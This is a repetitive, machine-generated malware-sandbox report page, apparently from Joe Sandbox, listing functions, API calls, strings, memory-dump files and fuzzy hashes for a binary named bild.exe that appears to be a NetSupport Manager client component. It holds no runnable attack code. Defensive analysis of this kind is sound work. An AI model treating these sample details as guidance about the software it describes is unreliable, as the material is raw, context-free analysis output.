Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_freewsprintf
String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
API String ID: 2441568934-1875806619
Opcode ID: af1373b32a9bb4e1f8f26d5d02c3c702896290850c3687507677e6fe67b99708
Instruction ID: 32575625ee732fca108261b890e952c9fd6c17214e61566243eaf6e55242290c
Opcode Fuzzy Hash: af1373b32a9bb4e1f8f26d5d02c3c702896290850c3687507677e6fe67b99708
Instruction Fuzzy Hash: D1F0A0BCE086651BD730DE99BC00FCAB7D05F1434CF050498EA8627682DBBA7549C2E6

Function 11061140 Relevance: 6.1, APIs: 4, Instructions: 131registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
RegEnumValueA.ADVAPI32(?,00000001,?,00000080,00000000,?,?,00000480), ref: 110612C3
RegCloseKey.ADVAPI32(?), ref: 110612D4

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: EnumValue$CloseOpen
String ID:
API String ID: 3785232357-0
Opcode ID: 7715bebcec98b19269c8f2ceb66aa64331a88d71416ba02ead887a332bffef31
Instruction ID: e119b506798adee895546c353bca4cd72f80153627c59e78ac85c5ed933e93b3
Opcode Fuzzy Hash: 7715bebcec98b19269c8f2ceb66aa64331a88d71416ba02ead887a332bffef31
Instruction Fuzzy Hash: 14412CB190061E9EDB20CB54CC84FDBBBBDAB89305F0045D9E649D7141EA70AA98CFA0

Function 110291D0 Relevance: 6.1, APIs: 4, Instructions: 104sleepthreadwindowCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00001000,11027030,00000000,00000000,111ED468), ref: 110291F3
Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029212
PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029234
Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102923C

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: SleepThread$CreateMessagePost
String ID:
API String ID: 3347742789-0
Opcode ID: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
Instruction ID: 6c329cfe7713c70c74540dd837a6755ec0a493dd99a0e0f492d5b7c5eaff94cf
Opcode Fuzzy Hash: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
Instruction Fuzzy Hash: E831D476D42230ABD602DBDCCC80FAABBA8A755758F914134F9395B6C8D6717805CBD0

Function 110B3340 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0000002C,F3EE1E80,?,?,00000000,00000000,00000000,Function_00182078,000000FF,?,1103D571,?,F3EE1E80,?,?,00000000), ref: 110B336F
LeaveCriticalSection.KERNEL32(0000002C,?,1103D571,?,F3EE1E80,?,?,00000000,?,00000015,00000000), ref: 110B338E
SetEvent.KERNEL32(?,?,?,1103D571,?,F3EE1E80,?,?,00000000,?,00000015,00000000), ref: 110B33D4
LeaveCriticalSection.KERNEL32(0000002C,?,?,1103D571,?,F3EE1E80,?,?,00000000,?,00000015,00000000), ref: 110B33DB

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterEvent
String ID:
API String ID: 3394196147-0
Opcode ID: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
Instruction ID: 2836c68be1e173ca97a40bbc94208784cbdba460b006acea4806f33579668287
Opcode Fuzzy Hash: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
Instruction Fuzzy Hash: 6221DF76A087089FD315CFA8D884B9AF7E8FB4C715F008A2EE816C7640DB79B404CB94

Function 110071A5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477

CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110072F7
SetFocus.USER32(?), ref: 11007353

Strings

edit, xrefs: 110072F1

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CreateFocusWindow_malloc_memsetwsprintf
String ID: edit
API String ID: 1305092643-2167791130
Opcode ID: 9ab5e62bba32fe41a4b3d3dad999fb9395a40b928699cb569382db604b8d03bd
Instruction ID: cb86e9af08271205595a6f41abc8b2cb286fac045a185d6d6013f354b30fec65
Opcode Fuzzy Hash: 9ab5e62bba32fe41a4b3d3dad999fb9395a40b928699cb569382db604b8d03bd
Instruction Fuzzy Hash: 8951B1B6A00606AFE741CF64CC80BABB7E5FB88354F15816DF955C7340EB34E9428B61

Function 110091F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 11009265
_memmove.LIBCMT ref: 110092B6

Part of subcall function 11008D50: std::_Xinvalid_argument.LIBCPMT ref: 11008D6A

Strings

string too long, xrefs: 11009260

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 1f1b424e40fb871dbeacd2805d2b31d3ae09b279eb3827a2ae8406d4573c0ed5
Instruction ID: 8571876bfdcccba51c928a6a288fcd5c1e124ad980ef247a8f71a2e078b75a0c
Opcode Fuzzy Hash: 1f1b424e40fb871dbeacd2805d2b31d3ae09b279eb3827a2ae8406d4573c0ed5
Instruction Fuzzy Hash: A731C732B14A104BF720DE9CE88095FF7EDEBE57A4B20061FE599C7640E7719C5083A1

Function 11041350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 11041413
__CxxThrowException@8.LIBCMT ref: 11041421

Strings

VolumeControl exception : %hs, xrefs: 11041431

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: VolumeControl exception : %hs
API String ID: 3728558374-910296547
Opcode ID: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
Instruction ID: 3351f46422f9e7833a0dd597507e069f064f33e0319a204fc915276dbd9183a5
Opcode Fuzzy Hash: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
Instruction Fuzzy Hash: A721E775F006059FCF01CF65C890BFEF7E8EB49609FA085A9E81697A40DB35B904CBA1

Function 111471A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\bild.exe,00000104,?,11143E73,?), ref: 11143C49

_memmove.LIBCMT ref: 11147211

Strings

Failed to get callstack, xrefs: 111471BD

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CurrentFileModuleNameProcess_memmove
String ID: Failed to get callstack
API String ID: 4135527288-766476014
Opcode ID: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
Instruction ID: 4fb2fbc616631b5574b6180649b942946bf04768c5170edb731833e4cde01d29
Opcode Fuzzy Hash: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
Instruction Fuzzy Hash: D3219875A0011D9BCB14DF64DD94BAEB3B9EF8871CF1041AAEC0DA7240DB31AE54CB90

Function 11063090 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1106309F

Part of subcall function 1110F4A0: _malloc.LIBCMT ref: 1110F4A9
Part of subcall function 1110F4A0: _memset.LIBCMT ref: 1110F4D2

_swscanf.LIBCMT ref: 11063104

Strings

%d %d %d %d %d %d %d %d %d, xrefs: 110630FE

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: _memset$_malloc_swscanf
String ID: %d %d %d %d %d %d %d %d %d
API String ID: 226140750-2123045714
Opcode ID: 5de41e09c8b144a63b13678be45da27601cef65f4b7b935b85075449f985e797
Instruction ID: 298e6396b29eeabd8d352511c8cf028c9fd899b3f0ddf6bd5fc34ff26e9d1feb
Opcode Fuzzy Hash: 5de41e09c8b144a63b13678be45da27601cef65f4b7b935b85075449f985e797
Instruction Fuzzy Hash: 89117F76500205ABD721CA55CCC0EEB77FCEF89758B004919F64A8B540E671F958C7A1

Function 110D1370 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

wvsprintfA.USER32(?,?,1102C511), ref: 110D139B

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Strings

..\CTL32\NSMString.cpp, xrefs: 110D13AE
pszBuffer[1024]==0, xrefs: 110D13B3

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
API String ID: 175691280-2052047905
Opcode ID: 7dd045176ee68b653aa13a97f0e759d1521d44633953b37ee1248efe406da090
Instruction ID: 95fe0cd820de1796fd70713afb7a02e85a0165c228f84a05359d3cb2f5b90ec5
Opcode Fuzzy Hash: 7dd045176ee68b653aa13a97f0e759d1521d44633953b37ee1248efe406da090
Instruction Fuzzy Hash: 4FF0A47AA0025CBBCB00DEA5DD40BEEFBBD9B45248F044199E608A7140DE706A45C7A5

Function 11029170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D

CreateThread.KERNEL32(00000000,00000000,11026ED0,00000000,00000000,00000000), ref: 110291BE

Strings

*TapiFixPeriod, xrefs: 11029187
Bridge, xrefs: 1102918C

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CreateThread__wcstoi64
String ID: *TapiFixPeriod$Bridge
API String ID: 1152747075-2058455932
Opcode ID: 455249c5f577f5bc371cc96f4979fefb060ee84a49910c717fadbdf2b24322f5
Instruction ID: bf80e38bc05b38b2fab7e3f27e0d367de778c9bee9065702c43ca09430eaf323
Opcode Fuzzy Hash: 455249c5f577f5bc371cc96f4979fefb060ee84a49910c717fadbdf2b24322f5
Instruction Fuzzy Hash: 60F0E57074532D7EFB11DAD6CC45F79B6989300B08FA0003DF528551C8E6B1B9008766

Function 11001080 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091
m_hWnd, xrefs: 11001096

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitItemLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2046328329-2830328467
Opcode ID: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
Instruction ID: 77f34a7b6d351dc7c2bdf78fd4e91b5ab9e9d0feae3f5383371c0572f9fc60e5
Opcode Fuzzy Hash: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
Instruction Fuzzy Hash: 98E01ABA71025DBFD714CE95EC81EE7B3ACEB48364F008529FA2997640D6B0E85087A1

Function 11001040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 11001073

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051
m_hWnd, xrefs: 11001056

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
